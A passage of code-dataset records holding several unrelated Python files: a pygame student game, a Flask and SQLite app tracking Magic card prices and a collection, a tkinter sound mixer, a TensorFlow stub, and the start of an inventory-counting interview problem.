self.addValue(r.Classification)\n self.addValue(r.Price)\n self.endRow()\n self.endTable()\n query.close()\n","sub_path":"standard/reports/ItemTree.py","file_name":"ItemTree.py","file_ext":"py","file_size_in_byte":5891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"623503005","text":"import tensorflow as tf\n\nfrom tensorflow import keras\n\n\"\"\"\nThe idea is to create\n\n--> encoder --> latent --> decoder -->\n\n\n\n\n\n--> embeddings --> rnn --> generator --.\n\"\"\"\n\n\ndef main(args=None):\n (train_data, test_data), info = tfds.load('imdb_reviews/subwords8k',\n split=(tfds.Split.TRAIN, tfds.Split.TEST),\n with_info=True, as_supervised=True)\n\n embedding_layer = keras.layers.Embedding(1000, 5)\n result = embedding_layer(tf.constant([[0, 1, 2], [3, 4, 5]]))\n print(result.numpy())\n print(result.shape)\n","sub_path":"src/_experiments/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"163820576","text":"import pygame\nimport time\n\nWIN_WIDTH = 1024\nWIN_HEIGHT = 600\nBTN_WIDTH = 80\nBTN_HEIGHT = 80\nHP_WIDTH = 40\nHP_HEIGHT = 40\nFPS = 30\n\n# color (RGB)\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\n\n# initialization\npygame.init()\n# Create window surface\nwin = pygame.display.set_mode((WIN_WIDTH, WIN_HEIGHT))\n\n# load image (background, enemy, buttons)\nbackground_image = pygame.transform.scale(pygame.image.load(\"images/Map.png\"), (WIN_WIDTH, WIN_HEIGHT))\nenemy_image = pygame.transform.scale(pygame.image.load(\"images/enemy.png\"), (50, 50))\ncontinue_image = pygame.transform.scale(pygame.image.load(\"images/continue.png\"), (BTN_WIDTH, BTN_HEIGHT))\npause_image = pygame.transform.scale(pygame.image.load(\"images/pause.png\"), (BTN_WIDTH, BTN_HEIGHT))\nsound_image = pygame.transform.scale(pygame.image.load(\"images/sound.png\"), (BTN_WIDTH, BTN_HEIGHT))\nmuse_image = pygame.transform.scale(pygame.image.load(\"images/muse.png\"), (BTN_WIDTH, BTN_HEIGHT))\nhp_image = pygame.transform.scale(pygame.image.load(\"images/hp.png\"), (HP_WIDTH,HP_HEIGHT))\nhp_gray_image = pygame.transform.scale(pygame.image.load(\"images/hp_gray.png\"), (HP_WIDTH,HP_HEIGHT))\n\n# set the title\npygame.display.set_caption(\"My first game\")\n\n\n\nclass Game:\n def __init__(self):\n # window\n # ...(to be done)\n\n # hp\n self.hp = 7\n self.max_hp = 10\n pass\n\n def game_run(self):\n # game loop\n run = True\n while run:\n # event loop\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\n\n # draw background\n win.blit(background_image,(0,0))\n pygame.draw.rect(win, (0, 0, 0), [0, 0, 1024, 80])\n\n # draw enemy and health bar\n pygame.draw.rect(win,RED,[30,260,50,5])\n win.blit(enemy_image,(30,270))\n win.blit(hp_image,(400,0))\n win.blit(hp_image, (440, 0))\n win.blit(hp_image, (480, 0))\n win.blit(hp_image, (520, 0))\n win.blit(hp_image, (560, 0))\n win.blit(hp_image, (400, 40))\n win.blit(hp_image, (440, 40))\n win.blit(hp_gray_image, (480, 40))\n win.blit(hp_gray_image, (520, 40))\n win.blit(hp_gray_image, (560, 40))\n\n # draw menu (and buttons)\n win.blit(muse_image,(700,0))\n win.blit(sound_image, (780, 0))\n win.blit(continue_image, (860, 0))\n win.blit(pause_image, (940, 0))\n\n # draw time\n done = False\n clock = pygame.time.Clock()\n font = pygame.font.Font(None, 40)\n frame_count = 0\n frame_rate = 60\n\n while not done:\n # time loop\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n\n pygame.draw.rect(win, (0, 0, 0), [0, 570, 70, 50])\n\n total_seconds = frame_count // frame_rate\n\n minutes = total_seconds // 60\n\n seconds = total_seconds % 60\n\n output_string = \"{0:2}:{1:02}\".format(minutes, seconds)\n\n text_surface = font.render(output_string, True, WHITE)\n win.blit(text_surface, (0, 575))\n\n frame_count += 1\n clock.tick(frame_rate)\n pygame.display.update()\n pygame.quit()\n\n\nif __name__ == \"__main__\":\n covid_game = Game()\n covid_game.game_run()\n\npygame.quit()","sub_path":"Lab2.py","file_name":"Lab2.py","file_ext":"py","file_size_in_byte":3546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"639795892","text":"from flask import Flask, render_template, request\nimport sqlite3 as sql\nimport cardAverage\nimport datetime\nimport time\n\n\n# This is my flask file which runs the application\n\napp = Flask(__name__)\n\n# the location of the database, when running locally vs on server\ndbLoc = '/home/timc/flask_project/flask_app/CARDINFO.db'\n#dbLoc = 'CARDINFO.db'\n\n\ntry:\n print('collecting distinct names')\n card_names = []\n con = sql.connect(dbLoc)\n con.row_factory = sql.Row\n cur = con.cursor()\n cur.execute('''select distinct(name) \n from CARDS \n where substr(type,1,5) != \"Token\" \n and substr(type,1,6) != \"Emblem\" \n and substr(type,1,4) != \"Card\" \n and substr(type,1,6) != \"Scheme\" \n and onlineonly = \"False\" \n and nonfoil = \"True\"''')\n rows = cur.fetchall()\n con.close()\n for x in rows:\n card_names.append(x[0])\nexcept:\n print('could not collect distinct names')\n#\n# App routes:\n#\n# index: the front page, I have a static card example to show the site's features\n# list: I fetch and display a set of cards so users can see what kind of data I have\n# watchlist: a list of cards users can modify to track cards with\n# search: a series of get/post routes for searching for specific cards\n# topcards: an experimental page for displaying useful statistics and potential future features.\n# I have it displaying some pandas stuff right now.\n\n\n\n@app.route('/')\ndef index(chartID = 'chart_ID', chart_type = 'line', chart_height = 500):\n # the front page with a static example card\n priceList = []\n dateList = []\n cardId = \"810a3792-a689-4849-bc14-fb3c71153aba\"\n imageUrl = \"\"\n cardName = \"Land Tax\"\n\n\n con = sql.connect(dbLoc)\n con.row_factory = sql.Row\n cur = con.cursor()\n\n imageUrl = 'https://img.scryfall.com/cards/normal/front/8/1/810a3792-a689-4849-bc14-fb3c71153aba.jpg?1562920975'\n\n\n# collects price and date vals of land tax to load up front page quickly\n land_tax_vals = cur.execute(\"select * from frontpage order by datetime asc\")\n \n for vals in land_tax_vals:\n priceList.append(vals[1])\n dateList.append(vals[0])\n con.close()\n\n # chart insertion\n try:\n chart = {\"renderTo\": chartID, \"type\": chart_type, \"height\": chart_height, \"zoomType\": 'x'}\n series = [{\"name\": 'Price', \"data\": priceList}]\n title = {\"text\": cardName}\n xAxis = [{\"categories\": dateList},{'type':'datetime'}]\n yAxis = {\"title\": {\"text\": 'Price in dollars'}}\n pageType = 'graph'\n except:\n print('something went wrong with the highcart vars')\n\n return render_template('frontPage.html',\n pageType=pageType, \n chartID=chartID, \n chart=chart, \n series=series, \n title=title, \n xAxis=xAxis, \n yAxis=yAxis, \n imageUrl=imageUrl, \n cardId = cardId, \n cardName = cardName, \n card_names=card_names)\n\n@app.route('/list')\ndef listPage():\n con = sql.connect(dbLoc)\n con.row_factory = sql.Row\n cur = con.cursor()\n cur.execute(\"select * from CARDS where cardset='aer'\")\n rows = cur.fetchall()\n con.close()\n\n return render_template(\"listLayout.html\", rows = rows, card_names=card_names)\n\n@app.route('/watchlist', methods=['POST', 'GET'])\ndef watchlist():\n\n if request.method == 'GET':\n print('watchlist get request')\n rows = getWatchList()\n\n return render_template(\"watchlistLayout.html\", rows = rows, card_names=card_names)\n\n # post to insert\n elif request.form.get('removeCard') == None:\n print('/watchlist post request insert')\n con = sql.connect(dbLoc)\n con.row_factory = sql.Row\n cur = con.cursor()\n # this is the name from html\n r = (request.form['watchlist'])\n\n cardId = \"\"\n valueIndicator = \"\"\n\n # card ID fetching\n # selects first available ID where id's len is 3\n try:\n for cardIdNum in cur.execute(\"\"\"select ID \n from CARDS \n where UPPER(NAME)=UPPER((?)) \n and cards.ONLINEONLY != 'True' \n and length(cardset)=3 \n and nonfoil = 'True'\"\"\", \n (r, )):\n cardId = cardIdNum[0]\n except:\n print('could not find card')\n\n # the cardAverage week/month for the searched card\n valueIndicator = cardAverage.weekMonth(cardId)[2]\n\n # insert to watchlist\n try:\n cur.execute(\"INSERT or replace into watchlist (ID, PRICEDIRECTION) values (?, ?)\", \n (cardId, valueIndicator, ) )\n con.commit()\n except:\n print('could not insert card')\n con.close()\n\n rows = getWatchList()\n\n return render_template(\"watchlistLayout.html\", rows=rows, card_names=card_names)\n\n # post request to remove card from list\n else:\n print(\"remove card post request\")\n con = sql.connect(dbLoc)\n cur = con.cursor()\n cardID = request.form.get('removeCard')\n\n try:\n cur.execute(\"delete from watchlist where ID=(?)\", (cardID, ))\n print('removed ',cardID,' from watchlist')\n except:\n print('could not remove card from watchlist')\n con.commit()\n con.close()\n\n rows = getWatchList()\n\n return render_template(\"watchlistLayout.html\", rows = rows, card_names=card_names)\n\n@app.route('/search/', methods=['GET', 'POST'])\ndef searchID(cardId, chartID = 'chart_ID2', chart_type = 'line', chart_height = 500):\n # the search bar results for the layout html\n if request.method == \"GET\":\n print('search cardID get request')\n con = sql.connect(dbLoc)\n con.row_factory = sql.Row\n cur = con.cursor()\n\n # initializing my variables\n priceList = []\n dateList = []\n imageUrl = \"\"\n sameCards = []\n setCodes = []\n sameCardsCombo = []\n cardInfo = {}\n cardName = \"\"\n\n # selects name and set of the card\n try:\n for x in cur.execute(\"select NAME, CARDSET from CARDS where ID=(?)\", (cardId, )):\n print('the name is:', x[0])\n print('the set is:', x[1])\n cardName = x[0]\n setCodes.append(x[1])\n except:\n print('I couldnt get the card name')\n\n\n # select ids of all reprints\n print('card im looking up:', cardId)\n try:\n for x in cur.execute(\"\"\"select id, \n cardset \n from cards \n where name = (?) \n and cards.ONLINEONLY != 'True'\"\"\",(cardId,)):\n try:\n sameCards.append(x[0])\n except:\n print('could not append samecards in sameName')\n try:\n sameCardsCombo.append([x[0], x[1]])\n except:\n print('could not append sameCardCombo in sameName')\n \n print(\"i found an ID\")\n print(\"x 0:\",x[0])\n print(\"x 1:\",x[1])\n print('samecardcombo:',sameCardsCombo)\n except:\n print('I couldnt select the ids for samecards')\n\n try:\n print('running searchCard')\n imageUrl = searchCard(cardId, cur, priceList, dateList, imageUrl)\n print('prices:',priceList)\n except:\n print('cant perform searchcard')\n try:\n cur.execute(\"select cards.cmc, type, power, toughness, rarity from cards where cards.id == ((?))\",\n (cardId, ))\n fetchInfo = cur.fetchone()\n except:\n print('could not perform id sql search')\n\n for value in fetchInfo:\n print('value: ',value)\n try:\n cardInfo['cmc'] = fetchInfo['cmc']\n cardInfo['type'] = fetchInfo['type']\n cardInfo['power'] = fetchInfo['power']\n cardInfo['toughness'] = fetchInfo['toughness']\n cardInfo['rarity'] = fetchInfo['rarity']\n cardInfo['buylist'] = 'N/A'\n except:\n print('could not add values to cardInfo dictionary')\n\n print('the card cmc value:', cardInfo['cmc'])\n print('search value:', cardInfo['type'])\n print('power:',cardInfo['power'])\n\n con.close()\n\n # chart data routed to javascript\n chart = {\"renderTo\": chartID, \"type\": chart_type, \"height\": chart_height, \"zoomType\": 'x'}\n series = [{\"name\": 'Price', \"data\": priceList}]\n title = {\"text\": cardName}\n xAxis = {\"categories\": dateList}\n yAxis = {\"title\": {\"text\": 'Price in dollars'}}\n pageType = 'graph'\n\n return render_template(\"resultsLayout.html\", \n pageType=pageType, \n chartID=chartID, \n chart=chart, \n series=series, \n title=title, \n xAxis=xAxis, \n yAxis=yAxis, \n imageUrl=imageUrl, \n sameCards = sameCards, \n setCodes = setCodes, \n cardId = cardId, \n sameCardsCombo = sameCardsCombo, \n cardInfo = cardInfo, \n card_names=card_names)\n\n elif request.method == \"POST\":\n # post means i'm adding a card to the watchlist\n print('the request was post')\n\n con = sql.connect(dbLoc)\n cur = con.cursor()\n\n valueIndicator = cardAverage.weekMonth(cardId)[2]\n try:\n cur.execute(\"INSERT or replace into watchlist (ID, PRICEDIRECTION) values (?, ?)\", \n (cardId, valueIndicator, ) )\n con.commit()\n except:\n print('could not insert card')\n con.close()\n rows = getWatchList()\n\n return render_template(\"watchlistLayout.html\", rows = rows, card_names=card_names)\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('404.html'), 404\n\n\n@app.route('/search', methods=['POST'])\ndef searchResults(chartID = 'chart_ID2', chart_type = 'line', chart_height = 500):\n # search with the searchbar form result\n\n print('doing search post method')\n if request.form.get('searchbar') == None:\n print(\"request form searchbar is nothing:\", request.form.get('addCard'))\n return \"searchbar is nothing\"\n else:\n print('request form searchbar has a value')\n\n # r is the name in string format\n try:\n r = (request.form['searchbar'])\n print('r result is:', r)\n except:\n print('the r request did not go through')\n\n try:\n q = request.form\n print(\"q:\", q)\n except:\n print('cant print q')\n\n con = sql.connect(dbLoc)\n con.row_factory = sql.Row\n cur = con.cursor()\n\n cardId = \"\"\n priceList = []\n dateList = []\n imageUrl = \"\"\n cardInfo = {}\n sameCards = []\n sameCardsCombo = []\n # for the result of the name search, get the ID and put it in cardId\n try:\n print('checking for every card with the name:',r)\n searchResult = cur.execute(\"\"\"select id, \n cardset \n from cards \n where name = (upper(?)) \n and cards.ONLINEONLY != 'True' \n and length(cardset)=3\"\"\",(r,))\n\n print('looking at:',searchResult)\n\n if not searchResult:\n print('there was no search result')\n return 'there was no search result'\n for x in searchResult:\n print('value of x:',x)\n if not x:\n print('there was no search result')\n return \"there was no search result\"\n try:\n sameCards.append(x[0])\n print('appending samecards with :',x[0])\n except:\n print('could not append samecards in sameName')\n try:\n sameCardsCombo.append([x[0], x[1]])\n except:\n print('could not append sameCardCombo in sameName')\n\n print(\"x 0:\",x[0])\n print(\"x 1:\",x[1])\n print('samecardcombo:',sameCardsCombo)\n\n except:\n print('I couldnt select the ids for samecards')\n\n try:\n for cardIdNum in cur.execute(\"\"\"select ID, \n CARDSET from CARDS \n where UPPER(NAME)=UPPER((?)) \n and cards.ONLINEONLY != 'True' \n and length(cardset)=3 \n and cardset != 'mb1'\"\"\", \n (r, )):\n cardId = cardIdNum[0]\n print('cardId from execute:',cardId)\n # most cards have more than one printing, this compiles a list of each card\n # currently, I display the last card thats in my list I also filter to remove online cards and promos\n sameCards.append(cardIdNum[0])\n sameCardsCombo.append([cardIdNum[0], cardIdNum[1]])\n except:\n print('I couldnt get the cardID')\n\n # my test to print all the cards with the same name\n for x in sameCards:\n print('unique printing:',x)\n if not cardId:\n print('there is no card ID')\n return render_template('frontPage.html', card_names=card_names)\n imageUrl = searchCard(cardId, cur, priceList, dateList, imageUrl)\n\n print('imageUrl after searchcard:', imageUrl)\n print('priceList to display:',priceList)\n\n # here I collect the bits of data I want to display, cmc, color, stats etc\n cur.execute(\"\"\"select \n cmc, \n type, \n power, \n toughness, \n rarity \n from cards \n where id == ((?))\"\"\",\n (cardId, ))\n fetchInfo = cur.fetchone()\n\n for value in fetchInfo:\n print('value: ',value)\n try:\n cardInfo['cmc'] = fetchInfo[0]\n cardInfo['type'] = fetchInfo[1]\n cardInfo['power'] = fetchInfo[2]\n cardInfo['toughness'] = fetchInfo[3]\n cardInfo['rarity'] = fetchInfo[4]\n cardInfo['buylist'] = 'N/A'\n except:\n print('could not add values to cardInfo dictionary here')\n\n# cur.execute(\"\"\"select buylist.BUYPRICE, \n# buylist.DATETIME \n# from buylist, \n# cards, \n# CARDSET \n# where cards.id == ((?)) \n# and cards.CARDSET = CARDSET.CODE \n# and upper(cardset.name) = upper(replace (buylist.SETNAME,'-',' ')) \n# and upper(cards.name) = upper(buylist.NAME) \n# order by datetime desc\"\"\",\n# (cardId, ))\n\n\n\n print('the card cmc value:', cardInfo['cmc'])\n print('search value:', cardInfo['type'])\n print('power:',cardInfo['power'])\n\n con.close()\n\n # chart data\n try:\n chart = {\"renderTo\": chartID, \"type\": chart_type, \"height\": chart_height, \"zoomType\": 'x'}\n series = [{\"name\": 'Price', \"data\": priceList}]\n title = {\"text\": r}\n xAxis = {\"categories\": dateList}\n yAxis = {\"title\": {\"text\": 'Price in dollars'}}\n pageType = 'graph'\n except:\n print('something went wrong with the highcart vars')\n\n return render_template(\"resultsLayout.html\", \n pageType=pageType, \n chartID=chartID, \n chart=chart, \n series=series, \n title=title, \n xAxis=xAxis, \n yAxis=yAxis, \n imageUrl=imageUrl, \n sameCards = sameCards, \n cardId = cardId, \n sameCardsCombo = sameCardsCombo, \n cardInfo = cardInfo, \n card_names=card_names)\n\ndef searchCard(cardId, cur, priceList, dateList, imageUrl):\n # for the url I make the variable the string, and for the date and price I add them to the lists\n #import pdb; pdb.set_trace()\n print('im doing a search card for:', cardId)\n try:\n for cardUrl in cur.execute(\"select PICURL from cards where id=(?)\",(cardId,)):\n imageUrl = cardUrl[0]\n print('imageURL from searchcard:', imageUrl)\n # if the card is only foil, get foil prices. else get nonfoil prices\n\n # this for loop is what makes loading a search slow\n for priceN in cur.execute(\"select datetime,normprice from prices where id=(?) order by datetime asc\",(cardId,)):\n if priceN[1] is None:\n priceList.append(0)\n else:\n priceList.append(priceN[1])\n dateList.append(priceN[0])\n return imageUrl\n except:\n print('the for-loops didnt work for cardUrl and price chart lists')\n\ndef updateTrend(cardId):\n print('running updateTrend for',cardId)\n try:\n con = sql.connect(dbLoc)\n con.row_factory = sql.Row\n cur = con.cursor()\n print('connected to db')\n except:\n print('couldnt connect to db')\n\n try:\n valueIndicator = \"\"\n valueIndicator = cardAverage.weekMonth(cardId)[2]\n print('collected cardAverage')\n except:\n print('could not perform cardAverage')\n # insert to watchlist\n try:\n cur.execute(\"INSERT or replace into watchlist (ID, PRICEDIRECTION) values (?, ?)\", \n (cardId, valueIndicator, ) )\n con.commit()\n con.close()\n except:\n print('could not update card with updateTrend')\n con.close()\n\n\n@app.route('/search', methods=['GET'])\ndef searchGet():\n return render_template(\"searchGetLayout.html\", card_names=card_names)\n\n@app.route('/topCards')\ndef topCards():\n\n # tensorflow/keras processing could go here in the future\n\n # return render_template(\"topLayout.html\", rows = rows)\n return render_template(\"topLayout.html\", card_names=card_names)\n\n\n\n\n\n\n\n\n\n@app.route('/collection', methods=['GET', 'POST'])\ndef collectionPage():\n collection_rows = getCollection()\n today = getTime()\n\n try:\n # grab the chart values for today: total mrsp, and what I paid\n # push those numbers to the database for today's date\n cardsDb = sql.connect(dbLoc)\n cursor = cardsDb.cursor()\n todays_price,total_msrp,total_paid = collection_tally(collection_rows,cursor,today)\n tally_pusher(total_msrp,total_paid,cursor,today)\n cardsDb.commit()\n cardsDb.close()\n print('ran collection tally and pusher')\n except:\n print('could not run collection tally or pusher')\n print('values:')\n no_val = [todays_price,total_msrp,total_paid]\n for x in no_val:\n try:\n print(x)\n except:\n print('could not print val')\n\n if request.method == \"GET\":\n None\n # if its a post and adding a card from the form\n elif request.method == \"POST\" and request.form.get('removeCard') == None:\n\n try:\n # html form request\n user_id = 'timtim'\n cost_paid = 3\n number_owned = 1\n card_name = (request.form['name-form'])\n set_code = (request.form['set-form'])\n cost_paid = (request.form['cost-form'])\n number_owned = (request.form['number-form'])\n except:\n print('could not request html form data')\n\n try:\n # check form data results for missing info\n if number_owned is '':\n print('number owned is none')\n number_owned = 1\n else:\n print('number owned is not none')\n\n if cost_paid is '':\n print('cost is none')\n cost_paid = 0\n else:\n print('cost is not none')\n \n if set_code is '':\n print('set code is none')\n cardsDb = sql.connect(dbLoc)\n cursor = cardsDb.cursor()\n cursor.execute('''select cardset,\n id \n from cards \n where upper(name)=upper(?) \n and cards.ONLINEONLY != \"True\" \n and length(cardset)=3\n and nonfoil = \"True\"\n ''',\n (card_name,))\n set_code,card_id = cursor.fetchone()\n cardsDb.close()\n else:\n print('set code is known')\n except:\n print('something went wrong checking form data results')\n\n try:\n # select id from cards\n cardsDb = sql.connect(dbLoc)\n cursor = cardsDb.cursor()\n card_id = cursor.execute('''select id \n from cards \n where upper(name) = upper((?)) \n and upper(cardset) = upper((?))''',\n (card_name,set_code,))\n cardid = card_id.fetchone()[0]\n print('cardid:',cardid)\n except:\n print('could not select id from cards')\n\n try:\n print('selecting latest normprice')\n cursor.execute('''select normprice \n from prices where id = (?) \n order by datetime desc''',\n (cardid,))\n price = cursor.fetchone()\n print('card normprice:',price[0])\n if price[0] == None:\n print('price[0] is None')\n price[0] = 0\n except:\n print('could not select latest normprice')\n try:\n # insert into collections\n cursor.execute('''insert into collections \n (user_id, \n card_id, \n cost_paid, \n msrp, \n number_owned, \n name, \n code, \n datetime, \n transaction_id) \n values (?, ?, ?, ?, ?, ?, ?, ?, NULL)''',\n (user_id, \n cardid, \n cost_paid, \n price[0], \n number_owned, \n card_name, \n set_code, \n today, ))\n cardsDb.commit()\n except:\n print('could not insert into collections')\n unable = [user_id, \n cardid, \n cost_paid, \n price[0], \n number_owned, \n card_name, \n set_code, \n today]\n for x in unable:\n try:\n print(x)\n except:\n print('cant print this val')\n\n try:\n # print collections, run getCollection\n for x in cursor.execute('select * from collections'):\n print(x)\n collection_rows = getCollection()\n except:\n print('could not run getCollection')\n\n try:\n #pusher\n todays_price,total_msrp,total_paid = collection_tally(collection_rows,cursor,today)\n #pushes new information so graph will have current info\n tally_pusher(total_msrp,total_paid,cursor,today)\n cardsDb.commit()\n cardsDb.close()\n except:\n print('couldnt run collection tally, or pusher')\n print('values:')\n mis_val = []\n\n\n else:\n print(\"remove card post collection\")\n con = sql.connect(dbLoc)\n cur = con.cursor()\n transaction_id = request.form.get('removeCard')\n\n try:\n cur.execute(\"delete from collections where transaction_id=(?)\", (transaction_id, ))\n print('removed ',transaction_id,' from collections')\n except:\n print('could not remove card from collections')\n con.commit()\n con.close()\n\n collection_rows = getCollection()\n\n cardsDb = sql.connect(dbLoc)\n cursor = cardsDb.cursor()\n todays_price,total_msrp,total_paid = collection_tally(collection_rows,cursor,today)\n #pushes new information so graph will have current info\n tally_pusher(total_msrp,total_paid,cursor,today)\n cardsDb.commit()\n cardsDb.close()\n\n p = price_chart()\n try:\n perc = int(total_msrp/total_paid * 100)\n except:\n perc = 0\n\n return render_template(\"collection.html\", \n collection_rows = collection_rows, \n todays_price=todays_price, \n perc = perc, \n total_msrp = round(total_msrp,2), \n total_paid=round(total_paid,2), \n pageType=p[5], \n chartID=\"chart_ID\", \n chart=p[0], \n series=p[1], \n title=p[2], \n xAxis=p[3], \n yAxis=p[4], \n card_names=card_names)\n\ndef getWatchList():\n# this is a function to get the watchlist results which I use in my GET and POST for /watchlist\n print('running getwatchlist')\n try:\n con = sql.connect(dbLoc)\n con.row_factory = sql.Row\n cur = con.cursor()\n print('connected to db')\n except:\n print('could not connect to db')\n try:\n cur.execute(\"\"\"select cards.name, \n watchlist.pricedirection, \n cards.id \n from watchlist, \n cards \n where watchlist.id = cards.id\"\"\")\n rows = cur.fetchall()\n except:\n print('could not select watchlist')\n\n for x in rows:\n print(x['id'])\n\n con.close()\n return rows\n\ndef getCollection():\n# selects existing card information from collection db\n print('running getCollection')\n try:\n con = sql.connect(dbLoc)\n con.row_factory = sql.Row\n cur = con.cursor()\n print('connected to db')\n except:\n print('could not connect to db')\n try:\n cur.execute(\"select * from collections where user_id = 'timtim'\")\n except:\n print('could not select collection')\n try:\n rows = cur.fetchall()\n print('selecting all collection values for timtim:')\n except:\n print('could not fetch all collection')\n\n try:\n for x in rows:\n print(x['name'])\n except:\n print('could not print rows')\n con.close()\n try:\n print('returning rows')\n return rows\n except:\n print('get_collection returned nothing')\n return []\n\ndef getTime():\n# returns todays date in string format\n ts = time.time()\n dailyTime = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d')\n print('test getTime:',dailyTime)\n return dailyTime\n\ndef yesterday():\n# returns yesterdays date in string format\n ts = time.time() - 86400\n dailyTime = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d')\n print('test yesterday:',dailyTime)\n return dailyTime\n\ndef collection_tally(collection_rows,cursor,today):\n# counts up values of the cards listed in user's collection\n# returns the total values \n print('running collection tally')\n todays_price = []\n total_msrp = 0\n total_paid = 0\n\n for card in collection_rows:\n cursor.execute('''select normprice \n from prices \n where id = (?) \n order by datetime desc''',(card[\"card_id\"],))\n try:\n prix = cursor.fetchone()\n try:\n if prix[0] == None:\n print('prix is None')\n prix[0] = 0\n else:\n print('price is:',prix[0])\n except:\n print('could not fix prix')\n print('prix is:',[prix])\n todays_price.append(prix)\n print('number owned:',card[\"number_owned\"])\n total_msrp = total_msrp+ card[\"number_owned\"] * prix[0]\n total_paid = total_paid+ card[\"number_owned\"] * card[\"cost_paid\"]\n except:\n print('something went wrong with collection_tally calculations')\n\n #total_paid could also go here\n return todays_price,total_msrp,total_paid\n\ndef tally_pusher(total_msrp,total_paid,cursor,today):\n# push the daily tally to a db\n# this is a wrapper for a user's tally. I currently have it hardcoded to \"timtim\".\n print('running tally pusher:')\n print('todays msrp is:',total_msrp)\n try:\n cursor.execute('''insert or replace \n into COLLECTION_VAL \n (USER_ID,COL_VAL,PAID_VAL,DATETIME) \n values (?,?,?,?)''',\n (\"timtim\",total_msrp,total_paid,today,))\n print('tally pushed')\n except:\n print('could not push tally')\n print('tally pusher ending')\n\ndef price_chart():\n# used for displaying collection highcart\n# returns values in a dictionary\n print('running price_chart')\n try:\n print('refreshing chart data')\n cardsDb = sql.connect(dbLoc)\n cursor = cardsDb.cursor()\n chart_vals = cursor.execute(\"\"\"select DATETIME,\n COL_VAL, \n PAID_VAL \n from collection_val \n order by datetime asc\"\"\")\n except:\n print('could not refresh chart data')\n x_ax = []\n y_ax = []\n z_ax = []\n try:\n for vals in chart_vals:\n print(vals)\n x_ax.append(vals[0])\n y_ax.append(vals[1])\n z_ax.append(vals[2])\n cardsDb.close()\n except:\n print('could not append chart_vals')\n cardsDb.close()\n\n # chart insertion\n\n try:\n chart = {\"renderTo\": \"chart_ID\", \"type\": \"area\", \"height\": 500, \"zoomType\": 'x'}\n series = [{\"name\": \"MSRP\", \"data\": y_ax},{\"name\": \"Paid\",\"data\":z_ax}]\n title = {\"text\": \"cost vs value\"}\n xAxis = [{\"categories\": x_ax},{'type':'datetime'}]\n yAxis = {\"title\": {\"text\": 'Price in dollars'}}\n pageType = 'graph'\n except:\n print('something went wrong with the highcart vars')\n# this line converts lists of my dates to date objects. \n# change \"datetime\" at the end to the list's name(x_ax in this case)\n# dates_list = [dt.datetime.strptime(date, '%Y-%m-%d').date() for date in datetime]\n return [chart,series,title,xAxis,yAxis,pageType]\n\n\n\n\ndef buy_vs_tcg():\n None\n '''select buylist.DATETIME,\n buylist.BUYPRICE,\n prices.NORMPRICE from \n buylist,\n cardset,\n cards,\n prices \n where upper(cardset.NAME) = upper(buylist.SETNAME) \n and buylist.name = \"Land Tax\" \n and buylist.SETNAME = \"battlebond\" \n and cardset.code = cards.CARDSET \n and cards.NAME = buylist.NAME \n and prices.id = cards.ID \n and buylist.datetime=prices.DATETIME \n order by buylist.datetime'''\n\n\ndef get_id(name,setCode):\n# returns card ID with a name and set code\n con = sql.connect(dbLoc)\n cursor = con.cursor()\n cursor.execute('''select cards.id \n from cards \n where upper(cards.name) = upper(?) \n and cards.cardset = (?)''',\n (name,setCode))\n card_id = cursor.fetchone()\n print('card_id:',card_id)\n con.close()\n return card_id\n\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n\n\n","sub_path":"project_flask.py","file_name":"project_flask.py","file_ext":"py","file_size_in_byte":29804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"215977462","text":"from tkinter import *\nfrom sound_panel import *\n# from tkinter.messagebox import askokcancel\nimport pygame.mixer\nimport os\n\napp = Tk()\napp.title(\"Sound Mix\")\n# app.geometry('300x100+200+100')\n\n# Start the sound system\nmixer = pygame.mixer\nmixer.init()\n\n# Get names of all files in current directory\ndirList = os.listdir(\".\")\n# Take each of the filenames...\nfor fname in dirList:\n # ... an if it ends in \".wav\"\n if fname.endswith(\".wav\"):\n # Create the panel and add it to the GUI\n panel = SoundPanel(app, mixer, fname)\n panel.pack()\n\n\n# This function will stop all necessary jobs before shutdown\ndef shutdown():\n # if askokcancel(title=\"Are you sure?\", message=\"Do you really want to quit?\"):\n # Stop any paying tracks\n mixer.stop()\n # Close the application\n app.destroy()\n\napp.protocol(\"WM_DELETE_WINDOW\", shutdown)\n\n# Start the GUI event loop\napp.mainloop()\n","sub_path":"sound-mixer/soundmix.py","file_name":"soundmix.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"189058406","text":"# Amazon would like to know how much inventory exists in their closed inventory compartments. Given a string s\n# consisting of items as \"*\" and closed compartments as an open and close \"|\", an array of starting indices startIndices, and an array of ending indices endIndices, determine the number of items in closed compartments within the substring between the two indices, inclusive.\n#\n# An item is represented as an asterisk ('*' = ascii decimal 42)\n# A compartment is represented as a pair of pipes that may or may not have items between them ('|' = ascii decimal 124).\n#\n# Example\n#\n# s = '|**|*|*'\n#\n# startIndices = [1, 1]\n#\n# endIndices = [5, 6]\n#\n# The string has a total of 2 closed compartments, one with 2 items and one with 1 item. For the first pair of indices, (1, 5), the substring is '|**|*'. There are 2 items in a compartment.\n#\n# For the second pair of indices, (1, 6), the substring is '|**|*|' and there are 2 + 1 = 3 items in compartments.\n#\n# Both of the answers are returned in an array, [2, 3].\n#\n# Function Description\n#\n# Complete the numberOfItems function in the editor below. The function must return an integer array that contains the results for each of the startIndices[i] and endIndices[i] pairs.\n#\n# numberOfItems has three parameters:\n#\n# s: A string to evaluate\n#\n# startIndices: An integer array, the starting indices.\n#\n# endIndices: An integer array, the ending indices.\n#\n# Constraints\n#\n# 1 ≤ m, n ≤ 10^5\n# 1 ≤ startIndices[i] ≤ endIndices[i] ≤ n\n# Each character of s is either '*' or '|'\n\nclass Solution:\n def 